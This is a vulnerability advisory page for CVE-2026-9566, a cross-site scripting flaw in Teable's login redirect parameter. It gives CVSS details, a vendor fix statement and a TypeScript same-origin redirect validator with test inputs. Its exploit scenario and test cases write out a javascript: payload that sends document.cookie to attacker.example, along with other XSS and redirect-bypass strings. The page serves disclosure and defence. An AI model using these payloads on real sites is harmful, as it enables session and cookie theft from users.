
Teable CVE-2026-9566

EUVD-2026-31906 · LOW
Cross-site Scripting (XSS) (CWE-79)
2026-05-26 · VulDB · GHSA-6mmc-c65c-3cjp
CVSS 4.0 score 2.1 (NVD)

Severity by source

NVD PRIMARY
2.1 LOW
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS Vector (NVD)

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P (metrics given as X in the full vector string are Not Defined and are omitted here)
Attack Vector: Network (AV:N)
Attack Complexity: Low (AC:L)
Attack Requirements: None (AT:N)
Privileges Required: None (PR:N)
User Interaction: Passive (UI:P)
Vulnerable System Impact: Confidentiality None (VC:N), Integrity Low (VI:L), Availability None (VA:N)
Subsequent System Impact: None (SC:N/SI:N/SA:N)
Exploit Maturity: Proof-of-Concept (E:P)
Safety (S, supplemental metric): Not Defined (X). CVSS 4.0 has no Scope metric; the S in the vector is Safety, not Scope.

Lifecycle Timeline

  • Source Code Evidence Fetched: Jun 08, 2026 13:39 (vuln.today)
  • Analysis Generated: Jun 08, 2026 13:39 (vuln.today)
  • Severity Changed: May 26, 2026 18:22 (NVD), MEDIUM → LOW
  • CVSS Changed: May 26, 2026 18:22 (NVD), 4.3 (MEDIUM) → 2.1 (LOW)

Description (CVE.org)

A vulnerability was identified in teableio teable up to 1.9.x. This impacts an unknown function of the file apps/nextjs-app/src/features/auth/pages/LoginPage.tsx of the component Sign-up. The manipulation of the argument redirect leads to cross-site scripting. The attack can be carried out remotely. The exploit is publicly available and might be used. Upgrading to version release.2026-04-21T08-57-20Z.1513 will fix this issue. The affected component should be upgraded. The vendor confirms: "The default branch of teableio/teable is develop, and the reported login redirect issue has already been fixed there. The login redirect flow now validates the redirect parameter with isValidRedirectPath() before navigation, which blocks javascript:, data:, and cross-origin redirects."

Analysis (AI)

Cross-site scripting in Teable's authentication redirect flow (versions 1.0-1.9.x) allows a remote, unauthenticated attacker to inject and execute arbitrary JavaScript in a victim's browser by crafting a login URL whose redirect parameter uses a javascript: or data: URI scheme. The vulnerable components are LoginPage.tsx in the Next.js frontend and the social auth controller adapter in the NestJS backend, neither of which validated the redirect destination before navigating. …


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata

  • Access: Craft a login URL with a javascript: redirect parameter
  • Delivery: Deliver the URL to the victim via phishing or social engineering
  • Exploit: Victim navigates to the malicious Teable login link
  • Execution: Victim completes authentication (login or sign-up)
  • Persist: The unvalidated redirect executes the attacker's JavaScript in the victim's authenticated browser session
  • Impact: Attacker exfiltrates session tokens or performs actions as the victim

Vulnerability Assessment (AI)

Exploitation: Exploitation requires that the victim click an attacker-crafted login or sign-up URL containing a malicious value in the `redirect` query parameter (e.g., a javascript: or data: URI), and then successfully complete the Teable authentication flow on that page. …
Risk Assessment: The CVSS 4.0 score of 2.1 reflects the constrained real-world risk: the vector (AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P) shows network-reachable, low-complexity exploitation with no privileges required, but it mandates user interaction (UI:P) and yields only low integrity impact with no confidentiality or availability consequence. Because the vector also sets E:P (exploit maturity: proof-of-concept), the 2.1 is a base-plus-threat (CVSS-BT) score rather than a pure base score. …
Exploit Scenario: An attacker sends a victim a phishing link to the Teable login page with a crafted `redirect` parameter such as `https://teable.example.com/login?redirect=javascript:fetch('https://attacker.example/steal?c='+document.cookie)`. When the victim authenticates, the application follows the unvalidated redirect, executing the attacker's JavaScript in the victim's browser session. Note that document.cookie exposes only cookies not flagged HttpOnly; a payload running in the page can still issue authenticated same-origin requests on the victim's behalf, which is consistent with the low integrity impact (VI:L) in the vector. …
Remediation: Upgrade to the vendor-released patch version release.2026-04-21T08-57-20Z.1513, available at https://github.com/teableio/teable/releases/tag/release.2026-04-21T08-57-20Z.1513. Per the vendor statement above, the fix validates the `redirect` parameter with isValidRedirectPath() before navigation and rejects javascript:, data: and cross-origin targets. …
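Added example, not Teable's code: a TypeScript allow-list check for a post-login `redirect` parameter in the spirit of the isValidRedirectPath() validation the vendor describes, exercised against the javascript: payload from the exploit scenario above and several variants that defeat naive prefix checks. The function name safeRedirectPath, the appOrigin parameter and the sample inputs are assumptions/constructed for this example; the approach is to resolve the candidate with the WHATWG URL parser and accept it only if the result shares the application's own origin.

```typescript
// Added example (not Teable's code). Assumed names: safeRedirectPath, appOrigin.
// Returns the normalised same-origin path to navigate to, or null if the
// candidate must be rejected. Resolving through the WHATWG URL parser instead
// of checking string prefixes is what makes the usual bypasses fail: the
// parser lowercases the scheme, strips embedded tabs/newlines, treats "\" like
// "/" for http(s), and exposes the real host behind "user@host" forms.
function safeRedirectPath(candidate: unknown, appOrigin: string): string | null {
  if (typeof candidate !== "string" || candidate.length === 0 || candidate.length > 2048) {
    return null;
  }
  let own: URL;
  let target: URL;
  try {
    own = new URL(appOrigin);
    target = new URL(candidate, own); // relative paths resolve against our own origin
  } catch {
    return null; // unparsable input: fail closed
  }
  // javascript:, data:, blob:, file: and similar schemes have an opaque ("null")
  // origin and are rejected here, as are cross-origin http(s) URLs, including
  // the user-info trick https://app.example@attacker.example/.
  if (target.origin !== own.origin) return null;
  // Defence in depth: the origin check already implies http(s), but say so explicitly.
  if (target.protocol !== "http:" && target.protocol !== "https:") return null;
  // Hand back a re-serialised path relative to our origin so the caller never
  // navigates to the raw attacker-controlled string.
  return target.pathname + target.search + target.hash;
}

// Constructed test inputs (not from the advisory), paired with the verdict a
// login page should produce for each.
const SAMPLE_CASES: Array<[string, string | null]> = [
  ["/space/abc123?tab=views", "/space/abc123?tab=views"],
  ["https://app.example/base/xyz", "/base/xyz"], // absolute but same-origin
  ["javascript:fetch('https://attacker.example/steal?c='+document.cookie)", null],
  ["JaVaScRiPt:alert(1)", null],                 // scheme is case-insensitive
  ["java\tscript:alert(1)", null],               // parser removes the tab -> javascript:
  ["data:text/html,<script>alert(1)</script>", null],
  ["//attacker.example/", null],                 // protocol-relative
  ["/\\attacker.example/", null],                // browsers treat "\" as "/" here
  ["https://app.example@attacker.example/", null],
  ["https://app.example.attacker.example/", null],
];

// True when every constructed case gets the expected verdict.
function runSamples(appOrigin = "https://app.example"): boolean {
  return SAMPLE_CASES.every(([input, expected]) => safeRedirectPath(input, appOrigin) === expected);
}
```

runSamples() returns true when every constructed case is classified as intended. Two design points matter in practice: compare origins after parsing rather than matching the start of the string, and navigate to the re-serialised path the function returns rather than to the original parameter, so that whatever the parser normalised away can never reach `window.location` or the router.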



CVE-2026-9566 vulnerability details – vuln.today
